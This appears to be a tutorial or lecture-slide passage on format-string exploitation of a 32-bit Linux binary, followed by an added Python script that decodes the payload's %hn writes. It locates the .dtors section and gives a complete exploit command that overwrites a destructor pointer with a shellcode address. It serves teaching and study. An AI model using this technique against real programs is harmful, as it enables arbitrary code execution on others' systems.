Computing .dtors Location
• The address location for our jump to shellcode should be 4 bytes past __DTOR_LIST__
• Target address using the example above is 0x080495bc
$ nm ./fmtstr | grep DTOR
080495bc d __DTOR_END__
080495b8 d __DTOR_LIST__
$ objdump -s -j .dtors ./fmtstr
./fmtstr: file format elf32-i386
Contents of section .dtors:
 80495b8 ffffffff 00000000  ........
$ ./fmtstr `printf "\xbe\x95\x04\x08\xbc\x95\x04\x08"`%.49143x%4\$hn%.16086x%5\$hn
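Added example (not from the original slides): a small Python decoder that reads the argument string above and reports which addresses its two %hn directives write and with what 16-bit values, so the arithmetic behind the widths can be checked against the nm output. It assumes, as the slide's %4$hn and %5$hn imply, that argument 4 is the first 4-byte word of the string itself; the function names are illustrative.

```python
import re

# Constructed from the command on the slide: two little-endian target
# addresses followed by the format directives (shell escapes removed).
PAYLOAD = (b"\xbe\x95\x04\x08\xbc\x95\x04\x08"
           b"%.49143x%4$hn%.16086x%5$hn")

# Matches the two directive shapes used on the slide: %.<N>x and %<k>$hn.
DIRECTIVE = re.compile(rb"%(?:(\d+)\$)?\.?(\d*)(hn|x)")

def decode_hn_writes(payload, first_arg=4):
    """Return {address: 16-bit value} for each %k$hn in the payload.

    Assumption: argument number `first_arg` is the first 4-byte word
    of the payload itself.
    """
    start = payload.index(b"%")
    # The leading bytes are the target addresses, 4 bytes each, little-endian.
    words = [int.from_bytes(payload[i:i + 4], "little")
             for i in range(0, start, 4)]
    printed = start            # the address bytes are echoed before any padding
    writes = {}
    for m in DIRECTIVE.finditer(payload, start):
        argno, width, conv = m.groups()
        if conv == b"x":
            # A precision of N pads the hex value to exactly N digits
            # (a 32-bit value never needs more than 8).
            printed += int(width or 1)
        else:
            # %hn stores the low 16 bits of the running output count.
            addr = words[int(argno) - first_arg]
            writes[addr] = printed & 0xFFFF
    return writes

def combined_pointer(writes, base):
    """Join the half-word writes at base and base+2 into one 32-bit value."""
    return (writes[base + 2] << 16) | writes[base]

if __name__ == "__main__":
    dtor_list = 0x080495B8     # __DTOR_LIST__ from the nm output above
    w = decode_hn_writes(PAYLOAD)
    for addr in sorted(w):
        print(f"{addr:#010x} <- {w[addr]:#06x}")
    print(f"slot {dtor_list + 4:#010x} = {combined_pointer(w, dtor_list + 4):#010x}")
```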